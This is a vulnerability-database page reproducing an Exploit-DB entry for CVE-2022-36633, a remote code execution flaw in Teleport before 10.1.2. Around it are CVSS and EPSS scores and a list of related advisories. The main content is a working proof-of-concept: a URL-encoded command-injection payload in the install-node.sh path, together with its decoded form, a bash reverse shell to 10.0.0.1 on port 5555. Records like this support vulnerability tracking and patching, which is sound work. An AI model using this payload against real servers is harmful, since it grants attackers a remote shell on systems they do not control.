Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbBrandon RoachEDB-ID:51019
HistorySep 23, 2022 - 12:00 a.m.

Teleport v10.1.1 - Remote Code Execution (RCE)

2022-09-2300:00:00
Brandon Roach
www.exploit-db.com
81
remote code execution
teleport v10.1.1
cve-2022-36633
linux
proof of concept

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

8.8

Confidence

High

EPSS

0.031

Percentile

91.2%

JSON
# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633

Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
method=3Diam


Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

Related

osv 3
cve 1
prion 1
zdt 2
github 1
veracode 1
nvd 1
packetstorm 2
cvelist 1
ibm 1
osv
osv
CGA-cp25-64gp-6fm3
2024-06-06 12:26:44
Improper token validation leading to code execution in Teleport
2022-08-25 00:00:28
CVE-2022-36633
2022-08-24 13:15:08
cve
cve
CVE-2022-36633
2022-08-24 13:15:08
prion
prion
Command injection
2022-08-24 13:15:00
zdt
zdt
Teleport v10.1.1 - Remote Code Execution Vulnerability
2022-09-23 00:00:00
Teleport 9.3.6 Command Injection Vulnerability
2022-08-23 00:00:00
github
github
Improper token validation leading to code execution in Teleport
2022-08-25 00:00:28
veracode
veracode
Command Injection
2022-08-25 12:54:27
nvd
nvd
CVE-2022-36633
2022-08-24 13:15:08
packetstorm
packetstorm
Teleport 10.1.1 Remote Code Execution
2022-09-23 00:00:00
Teleport 9.3.6 Command Injection
2022-08-23 00:00:00
cvelist
cvelist
CVE-2022-36633
2022-08-24 12:29:54
ibm
ibm
Security Bulletin: Multiple Vulnerabilities in IBM Cloud Pak for Multicloud Management
2024-09-25 17:28:27

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

8.8

Confidence

High

EPSS

0.031

Percentile

91.2%

JSON
Related for EDB-ID:51019
osv3cve1prion1zdt2github1veracode1nvd1packetstorm2cvelist1ibm1